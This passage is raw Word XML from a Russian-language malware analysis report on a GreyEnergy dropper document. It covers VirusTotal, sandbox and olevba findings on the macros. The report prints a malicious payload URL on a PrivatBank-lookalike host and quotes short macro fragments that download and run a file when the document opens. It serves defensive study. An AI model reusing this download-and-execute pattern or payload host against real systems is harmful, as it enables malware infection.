            <w:rStyle w:val="aff3"/>
          </w:rPr>
          <w:t>://</w:t>
        </w:r>
        <w:r w:rsidR="00D56E94" w:rsidRPr="009226AB">
          <w:rPr>
            <w:rStyle w:val="aff3"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>www</w:t>
        </w:r>
        <w:r w:rsidR="00D56E94" w:rsidRPr="009226AB">
          <w:rPr>
            <w:rStyle w:val="aff3"/>
          </w:rPr>
          <w:t>.</w:t>
        </w:r>
        <w:r w:rsidR="00D56E94" w:rsidRPr="009226AB">
          <w:rPr>
            <w:rStyle w:val="aff3"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>virustotal</w:t>
        </w:r>
        <w:r w:rsidR="00D56E94" w:rsidRPr="009226AB">
          <w:rPr>
            <w:rStyle w:val="aff3"/>
          </w:rPr>
          <w:t>.</w:t>
        </w:r>
        <w:r w:rsidR="00D56E94" w:rsidRPr="009226AB">
          <w:rPr>
            <w:rStyle w:val="aff3"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00D56E94">
        <w:rPr>
          <w:rStyle w:val="aff3"/>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D56E94" w:rsidRPr="00D56E94">
        <w:t xml:space="preserve">для предварительного анализа. </w:t>
      </w:r>
      <w:r w:rsidR="00D56E94">
        <w:t>Получаем следующий общий анализ вредоносности файла</w:t>
      </w:r>
      <w:r w:rsidR="00D56E94" w:rsidRPr="00D56E94">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34DFFE7A" w14:textId="69034056" w:rsidR="00D56E94" w:rsidRPr="00D56E94" w:rsidRDefault="00D56E94" w:rsidP="00D56E94">
      <w:r w:rsidRPr="00D56E94">
        <w:t>Предоставленные макросы демонстрируют несколько вариантов поведения, ко</w:t>
      </w:r>
      <w:r>
        <w:t>торые указывают на злой умысел.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74B6ADE6" w14:textId="27DBAC01" w:rsidR="00D56E94" w:rsidRPr="00D56E94" w:rsidRDefault="00D56E94" w:rsidP="00D56E94">
      <w:r w:rsidRPr="00D56E94">
        <w:t xml:space="preserve">1. Запутывание и декодирование: Макрос включает функцию </w:t>
      </w:r>
      <w:r w:rsidRPr="00D56E94">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>`</w:t>
      </w:r>
      <w:r w:rsidRPr="00D56E94">
        <w:rPr>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>B</w:t>
      </w:r>
      <w:r w:rsidRPr="00D56E94">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>64</w:t>
      </w:r>
      <w:r w:rsidRPr="00D56E94">
        <w:rPr>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Dec</w:t>
      </w:r>
      <w:r w:rsidRPr="00D56E94">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>`</w:t>
      </w:r>
      <w:r w:rsidRPr="00D56E94">
        <w:t xml:space="preserve">, которая расшифровывает строки, закодированные в </w:t>
      </w:r>
      <w:r w:rsidRPr="00D56E94">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Base</w:t>
      </w:r>
      <w:r w:rsidRPr="00D56E94">
        <w:t xml:space="preserve">64. Это часто используется во вредоносных программах для маскировки фактического выполняемого кода или </w:t>
      </w:r>
      <w:r w:rsidRPr="00D56E94">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r w:rsidRPr="00D56E94">
        <w:t>-адресов, что затрудняет аналитикам обнаружение вредоносно</w:t>
      </w:r>
      <w:r>
        <w:t>го поведения с первого взгляда.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1739A244" w14:textId="38418521" w:rsidR="00D56E94" w:rsidRPr="00D56E94" w:rsidRDefault="00D56E94" w:rsidP="00D56E94">
      <w:r w:rsidRPr="00D56E94">
        <w:t xml:space="preserve">2. Загрузка и выполнение файла: Функция </w:t>
      </w:r>
      <w:r w:rsidRPr="00D56E94">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="00D56E94">
        <w:rPr>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>HashCheck</w:t>
      </w:r>
      <w:r w:rsidRPr="00D56E94">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="00D56E94">
        <w:t xml:space="preserve"> создает объект, используя декодированную строку из </w:t>
      </w:r>
      <w:r w:rsidRPr="00D56E94">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="00D56E94">
        <w:rPr>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>B</w:t>
      </w:r>
      <w:r w:rsidRPr="00D56E94">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>64</w:t>
      </w:r>
      <w:r w:rsidRPr="00D56E94">
        <w:rPr>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Dec</w:t>
      </w:r>
      <w:r w:rsidRPr="00D56E94">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="00D56E94">
        <w:t xml:space="preserve">, которая выглядит как </w:t>
      </w:r>
      <w:r w:rsidRPr="00D56E94">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r w:rsidRPr="00D56E94">
        <w:t xml:space="preserve">-адрес. Затем он пытается загрузить содержимое с этого </w:t>
      </w:r>
      <w:r w:rsidRPr="00D56E94">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r w:rsidRPr="00D56E94">
        <w:t>-адреса (`</w:t>
      </w:r>
      <w:r w:rsidRPr="00D56E94">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>http</w:t>
      </w:r>
      <w:r w:rsidRPr="00D56E94">
        <w:t>://</w:t>
      </w:r>
      <w:r w:rsidRPr="00D56E94">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>pbank</w:t>
      </w:r>
      <w:r w:rsidRPr="00D56E94">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00D56E94">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>co</w:t>
      </w:r>
      <w:r w:rsidRPr="00D56E94">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00D56E94">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ua</w:t>
      </w:r>
      <w:r w:rsidRPr="00D56E94">
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00D56E94">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>favicon</w:t>
      </w:r>
      <w:r w:rsidRPr="00D56E94">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00D56E94">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ico</w:t>
      </w:r>
      <w:r w:rsidRPr="00D56E94">
        <w:t>`) и сохранить его во временном каталоге пользователя. После сохранения загруженный файл запускается. Такое поведение характерно для вредоносных программ, которые стремятся загрузить и выполнить до</w:t>
      </w:r>
      <w:r>
        <w:t>полнительную полезную нагрузку.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4156B40A" w14:textId="20F332EE" w:rsidR="00D56E94" w:rsidRDefault="00D56E94" w:rsidP="00D56E94">
      <w:r w:rsidRPr="00D56E94">
        <w:t xml:space="preserve">3. Сетевая активность: использование команды </w:t>
      </w:r>
      <w:r w:rsidRPr="00D56E94">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>`</w:t>
      </w:r>
      <w:r w:rsidRPr="00D56E94">
        <w:rPr>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>h</w:t>
      </w:r>
      <w:r w:rsidRPr="00D56E94">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00D56E94">
        <w:rPr>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Open</w:t>
      </w:r>
      <w:r w:rsidRPr="00D56E94">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> "</w:t>
      </w:r>
      <w:r w:rsidRPr="00D56E94">
        <w:rPr>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>get</w:t>
      </w:r>
      <w:r w:rsidRPr="00D56E94">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">", </w:t>
      </w:r>
      <w:r w:rsidRPr="00D56E94">
        <w:rPr>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>B</w:t>
      </w:r>
      <w:r w:rsidRPr="00D56E94">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>64</w:t>
      </w:r>
      <w:r w:rsidRPr="00D56E94">
        <w:rPr>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Dec</w:t>
      </w:r>
      <w:r w:rsidRPr="00D56E94">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>(...)"</w:t>
      </w:r>
      <w:r w:rsidRPr="00D56E94">
        <w:t xml:space="preserve"> указывает на то, что макрос отправляет </w:t>
      </w:r>
      <w:r w:rsidRPr="00D56E94">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r w:rsidRPr="00D56E94">
        <w:t xml:space="preserve">-запросы </w:t>
      </w:r>
      <w:r w:rsidRPr="00D56E94">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>GET</w:t>
      </w:r>
      <w:r w:rsidRPr="00D56E94">
        <w:t xml:space="preserve"> на внешние серверы. Это может быть способ удаления данных или дальнейшей загрузки вредоносных программ.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1429CCAE" w14:textId="5C006769" w:rsidR="00D56E94" w:rsidRDefault="00D56E94" w:rsidP="00D56E94">
      <w:r>
        <w:t>4. Манипулирование пользовательским интерфейсом: Макросы управляют элементами пользовательского интерфейса (например, кнопками включения/ выключения и изменением свойств текстового поля) на основе взаимодействия с пользователем. Хотя в некоторых контекстах это может быть безобидным, в сочетании с другими формами поведения это предполагает попытку контролировать действия пользователей и ограничить их возможности по взаимодействию с документом.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EC92335" w14:textId="07244D2C" w:rsidR="00D56E94" w:rsidRPr="00DE7BBB" w:rsidRDefault="00D56E94" w:rsidP="005D7E44">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5. Механизм сохранения: наличие подпрограммы </w:t>
      </w:r>
      <w:r w:rsidRPr="00D56E94">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>"Document_Open()"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> указывает на то, что при каждом открытии документа выполняются </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">определенные действия, что является обычной тактикой, используемой вредоносными программами для обеспечения ее выполнения при </w:t>
      </w:r>
      <w:r w:rsidR="005D7E44">
        <w:t>открытии зараженного документа.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49CC8638" w14:textId="6DD44533" w:rsidR="00D56E94" w:rsidRDefault="00D56E94" w:rsidP="00D56E94">
      <w:r>
        <w:t xml:space="preserve">6. Обработка ошибок: Использование параметра </w:t>
      </w:r>
      <w:r w:rsidRPr="00D56E94">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">`On Error Resume Next` </w:t>
      </w:r>
      <w:r>
        <w:t>во всем коде является тревожным сигналом, поскольку он подавляет сообщения об ошибках, которые могли бы предупредить пользователей о проблемах, позволяя макросу продолжать выполнять потенциально опасные действия без прерывания.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CF5A130" w14:textId="28667E01" w:rsidR="00D56E94" w:rsidRDefault="00D56E94" w:rsidP="00D56E94">
      <w:r>
        <w:t>7. Подозрительные вызовы функций: Макрос выполняет вызовы для создания объектов и отправки HTTP-запросов, которые не характерны для стандартной функциональности документа, но часто встречаются во вредоносных скриптах.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EFCC599" w14:textId="4CEF089F" w:rsidR="00D56E94" w:rsidRPr="00D56E94" w:rsidRDefault="00D56E94" w:rsidP="00D56E94">
      <w:r>
        <w:t xml:space="preserve">На рисунке 1 видно, что файл содержит вложенные </w:t>
      </w:r>
      <w:r w:rsidRPr="00D56E94">
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>bin</w:t>
      </w:r>
      <w:r w:rsidRPr="00D56E94">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">файлы и множество </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>xml</w:t>
      </w:r>
      <w:r w:rsidRPr="00D56E94">
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">строк, вероятно для загрузки </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>payload</w:t>
      </w:r>
      <w:r w:rsidRPr="00D56E94">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54ACD5BA" w14:textId="77777777" w:rsidR="00D56E94" w:rsidRDefault="00D56E94" w:rsidP="00D56E94">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00D56E94">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="43A193A3" wp14:editId="4EFC8377">
            <wp:extent cx="2910792" cy="40033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198" cy="400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3DF9" w14:textId="16AA2AD1" w:rsidR="00D56E94" w:rsidRDefault="00D56E94" w:rsidP="00D56E94">
      <w:pPr>
        <w:pStyle w:val="aff0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D56E94">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Рисунок </w:t>
      </w:r>
      <w:r w:rsidRPr="00D56E94">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00D56E94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D56E94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</w:t>
      </w:r>
      <w:r w:rsidRPr="00D56E94">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="002D5007">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00D56E94">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Информация о содержимом файла</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08E65672" w14:textId="5C085980" w:rsidR="00D56E94" w:rsidRPr="008E70B1" w:rsidRDefault="006053F5" w:rsidP="008E70B1">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">В графе </w:t>
      </w:r>
      <w:r w:rsidRPr="006053F5">
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Behavior</w:t>
      </w:r>
      <w:r w:rsidRPr="006053F5">
        <w:t xml:space="preserve">” </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">онлайн-песочница позволяет увидеть какие </w:t>
      </w:r>
      <w:r w:rsidR="008E70B1">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r w:rsidR="008E70B1" w:rsidRPr="008E70B1">
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="008E70B1">
        <w:t xml:space="preserve">запросы и в целом </w:t>
      </w:r>
      <w:r w:rsidR="008E70B1">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>IP</w:t>
      </w:r>
      <w:r w:rsidR="008E70B1" w:rsidRPr="008E70B1">
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="008E70B1">
        <w:t xml:space="preserve">трафик используются при открытии файла. Также можно увидеть используемые </w:t>
      </w:r>
      <w:r w:rsidR="008E70B1">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r w:rsidR="008E70B1" w:rsidRPr="008E70B1">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="008E70B1">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>TLS</w:t>
      </w:r>
      <w:r w:rsidR="008E70B1" w:rsidRPr="008E70B1">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="008E70B1">
        <w:t>действия с реестром и файловой системой.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0653B90E" w14:textId="3D2E844D" w:rsidR="00712D12" w:rsidRDefault="00712D12" w:rsidP="00712D12">
      <w:r>
        <w:t xml:space="preserve">Для дальнейшего статического анализа была использована утилита </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>olevba</w:t>
      </w:r>
      <w:r w:rsidRPr="00712D12">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">из набора </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>python</w:t>
      </w:r>
      <w:r w:rsidRPr="00712D12">
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>oletools</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, которая извлекает и анализирует макросы из документов </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Microsoft</w:t>
      </w:r>
      <w:r w:rsidRPr="00712D12">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Office</w:t>
      </w:r>
      <w:r w:rsidRPr="00712D12">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C96587D" w14:textId="24515F6F" w:rsidR="00712D12" w:rsidRDefault="00712D12" w:rsidP="00712D12">
      <w:pPr>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Запуск анализа производится с помощью команды </w:t>
      </w:r>
      <w:r w:rsidRPr="00712D12">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>olevba.exe "G</w:t>
      </w:r>
      <w:r w:rsidRPr="00712D12">
        <w:rPr>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>rey</w:t>
      </w:r>
      <w:r w:rsidRPr="00712D12">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">EnergyDropper.doc". </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60C6FA37" w14:textId="4768F01C" w:rsidR="008E70B1" w:rsidRPr="004E5D3A" w:rsidRDefault="008E70B1" w:rsidP="00712D12">
      <w:r>
        <w:t>По функциям, полученным по выводу утилиты, можно сделать следующий вывод - д</w:t>
      </w:r>
      <w:r w:rsidRPr="008E70B1">
        <w:t>окумент имитирует форму ПриватБанка (Украина) с кнопками "Получить кредит", "Отправить" и т.д. Это социальная инженерия, чтобы пользователь включил макросы.</w:t>
      </w:r>
      <w:r w:rsidR="004E5D3A" w:rsidRPr="004E5D3A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78C71110" w14:textId="4DD14832" w:rsidR="008E70B1" w:rsidRPr="002D5007" w:rsidRDefault="008E70B1" w:rsidP="00712D12">
      <w:r>
        <w:t xml:space="preserve">На рисунке 2 приведена итоговая таблица с вывода утилиты </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>olevba</w:t>
      </w:r>
      <w:r>
        <w:t>, о</w:t>
      </w:r>
      <w:r w:rsidR="002D5007">
        <w:t>писывающая макросы из документа</w:t>
      </w:r>
      <w:r w:rsidR="002D5007" w:rsidRPr="002D5007">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002D5007">
        <w:t xml:space="preserve">и расшифровывающая строки из </w:t>
      </w:r>
      <w:r w:rsidR="002D5007">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Base</w:t>
      </w:r>
      <w:r w:rsidR="002D5007" w:rsidRPr="002D5007">
        <w:t>64.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5606316D" w14:textId="77777777" w:rsidR="008E70B1" w:rsidRDefault="008E70B1" w:rsidP="008E70B1">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r w:rsidRPr="008E70B1">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="67CC0812" wp14:editId="143BAA6F">
            <wp:extent cx="5132159" cy="68925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2159" cy="68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7AA2" w14:textId="3290BEC0" w:rsidR="008E70B1" w:rsidRPr="008E70B1" w:rsidRDefault="008E70B1" w:rsidP="008E70B1">
      <w:pPr>
        <w:pStyle w:val="aff0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008E70B1">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Рисунок </w:t>
      </w:r>
      <w:r w:rsidRPr="008E70B1">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="008E70B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E70B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</w:t>
      </w:r>
      <w:r w:rsidRPr="008E70B1">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="008E70B1">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>. Макросы из документа</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="356D405A" w14:textId="52D95C54" w:rsidR="008E70B1" w:rsidRDefault="008E70B1" w:rsidP="008E70B1">
      <w:r>
        <w:t>Общая вредоносная логика выглядит следующим образом</w:t>
      </w:r>
      <w:r w:rsidRPr="008E70B1">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B4A97C5" w14:textId="32EA1735" w:rsidR="008E70B1" w:rsidRDefault="008E70B1" w:rsidP="008E70B1">
      <w:pPr>
        <w:pStyle w:val="af3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002D5007">
        <w:t>Триггер:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Срабатывает при открытии документа (</w:t>
      </w:r>
      <w:r w:rsidRPr="008E70B1">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Sub Document_Open()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="008E70B1">
        <w:t xml:space="preserve">см </w:t>
      </w:r>
      <w:r w:rsidR="002D5007">
        <w:t>рисунок 3</w:t>
      </w:r>
      <w:r>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F1828C2" w14:textId="0BC23194" w:rsidR="002D5007" w:rsidRDefault="002D5007" w:rsidP="002D5007">
      <w:pPr>
        <w:pStyle w:val="af3"/>
        <w:keepNext/>
        <w:ind w:left="1211" w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="002D5007">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="33F4C313" wp14:editId="2FE47E28">
            <wp:extent cx="2474258" cy="32169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5244" cy="32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F15B" w14:textId="14880C46" w:rsidR="008E70B1" w:rsidRPr="002D5007" w:rsidRDefault="002D5007" w:rsidP="002D5007">
      <w:pPr>
        <w:pStyle w:val="aff0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D5007">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Рисунок </w:t>
      </w:r>
      <w:r w:rsidRPr="002D5007">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="002D5007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2D5007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3</w:t>
      </w:r>
      <w:r w:rsidRPr="002D5007">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="002D5007">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">. Функция </w:t>
      </w:r>
      <w:r w:rsidRPr="002D5007">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Document</w:t>
      </w:r>
      <w:r w:rsidRPr="002D5007">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:r w:rsidRPr="002D5007">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Open</w:t>
      </w:r>
      <w:r w:rsidRPr="002D5007">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37AD4545" w14:textId="77777777" w:rsidR="008E70B1" w:rsidRPr="002D5007" w:rsidRDefault="008E70B1" w:rsidP="008E70B1"/>
    <w:p w14:paraId="0D4746B4" w14:textId="5099C30A" w:rsidR="008E70B1" w:rsidRDefault="008E70B1" w:rsidP="002D5007">
      <w:pPr>
        <w:pStyle w:val="af3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002D5007">
        <w:t>Вызов основной функции:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Вызывается </w:t>
      </w:r>
      <w:r w:rsidRPr="002D5007">
        <w:rPr>
          <w:i/>
